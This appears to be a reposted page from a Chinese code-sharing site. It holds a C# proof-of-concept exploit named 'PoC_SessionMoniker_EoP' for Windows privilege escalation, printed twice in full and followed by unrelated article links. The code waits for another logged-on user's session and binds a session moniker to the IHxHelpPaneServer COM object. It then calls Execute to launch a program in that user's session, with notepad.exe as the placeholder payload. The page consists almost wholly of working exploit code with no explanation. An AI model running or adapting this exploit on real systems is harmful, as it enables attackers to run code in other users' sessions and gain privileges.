PoC_SessionMoniker_EoP的C#实现版
来源:互联网 发布:php购物车系统设计 编辑:程序博客网 时间:2024/06/01 07:32
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
namespace PoC_SessionMoniker_EoP
{
class Program
{
[ComImport, Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IHxHelpPaneServer
{
void DisplayTask(string task);
void DisplayContents(string contents);
void DisplaySearchResults(string search);
void Execute([MarshalAs(UnmanagedType.LPWStr)] string file);
}
enum WTS_CONNECTSTATE_CLASS
{
WTSActive, // User logged on to WinStation
WTSConnected, // WinStation connected to client
WTSConnectQuery, // In the process of connecting to client
WTSShadow, // Shadowing another WinStation
WTSDisconnected, // WinStation logged on without client
WTSIdle, // Waiting for client to connect
WTSListen, // WinStation is listening for connection
WTSReset, // WinStation is being reset
WTSDown, // WinStation is down due to error
WTSInit, // WinStation in initialization
}
[StructLayout(LayoutKind.Sequential)]
struct WTS_SESSION_INFO
{
public int SessionId;
public IntPtr pWinStationName;
public WTS_CONNECTSTATE_CLASS State;
}
[DllImport("wtsapi32.dll", SetLastError = true)]
static extern bool WTSEnumerateSessions(
IntPtr hServer,
int Reserved,
int Version,
out IntPtr ppSessionInfo,
out int pCount);
[DllImport("wtsapi32.dll", SetLastError = true)]
static extern void WTSFreeMemory(IntPtr memory);
public static IEnumerable<int> GetSessionIds()
{
List<int> sids = new List<int>();
IntPtr pSessions = IntPtr.Zero;
int dwSessionCount = 0;
try
{
if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, out pSessions, out dwSessionCount))
{
IntPtr current = pSessions;
for (int i = 0; i < dwSessionCount; ++i)
{
WTS_SESSION_INFO session_info = (WTS_SESSION_INFO)Marshal.PtrToStructure(current, typeof(WTS_SESSION_INFO));
if (session_info.State == WTS_CONNECTSTATE_CLASS.WTSActive)
{
if (session_info.SessionId != 0)
{
sids.Add(session_info.SessionId);
}
}
current += Marshal.SizeOf(typeof(WTS_SESSION_INFO));
}
}
}
finally
{
if (pSessions != IntPtr.Zero)
{
WTSFreeMemory(pSessions);
}
}
return sids;
}
static void Main(string[] args)
{
try
{
int current_session_id = Process.GetCurrentProcess().SessionId;
int new_session_id = 0;
Console.WriteLine("Waiting For a Target Session");
while (true)
{
IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
if (sessions.Count() > 0)
{
new_session_id = sessions.First();
break;
}
Thread.Sleep(1000);
}
Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
Thread.Sleep(20000);
IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
server.Execute(target.AbsoluteUri);
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
}
}
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
namespace PoC_SessionMoniker_EoP
{
class Program
{
[ComImport, Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IHxHelpPaneServer
{
void DisplayTask(string task);
void DisplayContents(string contents);
void DisplaySearchResults(string search);
void Execute([MarshalAs(UnmanagedType.LPWStr)] string file);
}
enum WTS_CONNECTSTATE_CLASS
{
WTSActive, // User logged on to WinStation
WTSConnected, // WinStation connected to client
WTSConnectQuery, // In the process of connecting to client
WTSShadow, // Shadowing another WinStation
WTSDisconnected, // WinStation logged on without client
WTSIdle, // Waiting for client to connect
WTSListen, // WinStation is listening for connection
WTSReset, // WinStation is being reset
WTSDown, // WinStation is down due to error
WTSInit, // WinStation in initialization
}
[StructLayout(LayoutKind.Sequential)]
struct WTS_SESSION_INFO
{
public int SessionId;
public IntPtr pWinStationName;
public WTS_CONNECTSTATE_CLASS State;
}
[DllImport("wtsapi32.dll", SetLastError = true)]
static extern bool WTSEnumerateSessions(
IntPtr hServer,
int Reserved,
int Version,
out IntPtr ppSessionInfo,
out int pCount);
[DllImport("wtsapi32.dll", SetLastError = true)]
static extern void WTSFreeMemory(IntPtr memory);
public static IEnumerable<int> GetSessionIds()
{
List<int> sids = new List<int>();
IntPtr pSessions = IntPtr.Zero;
int dwSessionCount = 0;
try
{
if (WTSEnumerateSessions(IntPtr.Zero, 0, 1, out pSessions, out dwSessionCount))
{
IntPtr current = pSessions;
for (int i = 0; i < dwSessionCount; ++i)
{
WTS_SESSION_INFO session_info = (WTS_SESSION_INFO)Marshal.PtrToStructure(current, typeof(WTS_SESSION_INFO));
if (session_info.State == WTS_CONNECTSTATE_CLASS.WTSActive)
{
if (session_info.SessionId != 0)
{
sids.Add(session_info.SessionId);
}
}
current += Marshal.SizeOf(typeof(WTS_SESSION_INFO));
}
}
}
finally
{
if (pSessions != IntPtr.Zero)
{
WTSFreeMemory(pSessions);
}
}
return sids;
}
static void Main(string[] args)
{
try
{
int current_session_id = Process.GetCurrentProcess().SessionId;
int new_session_id = 0;
Console.WriteLine("Waiting For a Target Session");
while (true)
{
IEnumerable<int> sessions = GetSessionIds().Where(id => id != current_session_id);
if (sessions.Count() > 0)
{
new_session_id = sessions.First();
break;
}
Thread.Sleep(1000);
}
Console.WriteLine("Creating Process in Session {0} after 20secs", new_session_id);
Thread.Sleep(20000);
IHxHelpPaneServer server = (IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
Uri target = new Uri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "notepad.exe"));
server.Execute(target.AbsoluteUri);
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
}
}
0 0
- PoC_SessionMoniker_EoP的C#实现版
- C#版的6种单件实现
- 算法的基本实现C#版
- spider的 c#实现
- C#接口的实现
- C#实现的BinaryTree
- HeapSort的C#实现
- C#委托的实现
- C#迭代器的实现
- C#实现的BinaryTree
- C#单链表的实现
- SQLiteHelper的C#实现
- C#迷宫的实现~~
- C#四则运算的实现
- C# 俄罗斯方块的实现
- C# 实现的DnsServer
- C#事件的实现
- C#接口的实现
- 2017.03.24 复试结束,一切较好
- python 爬虫细节
- SSM个人博客系统搭建【一】:项目概述
- tomcat报馆解决办法
- springmvc重定向RedirectAttributes的用法
- PoC_SessionMoniker_EoP的C#实现版
- ZJOI2017酱油记
- pat L2-006. 树的遍历(后序+中序->层次)
- PHP 5.0网络编程技术视频教程
- 关于apache日志
- Cookie与Session的区别-总结很好的文章
- Android设计模式------工厂模式
- 2015年仿团800首页视频教程
- Python渗透测试工具合集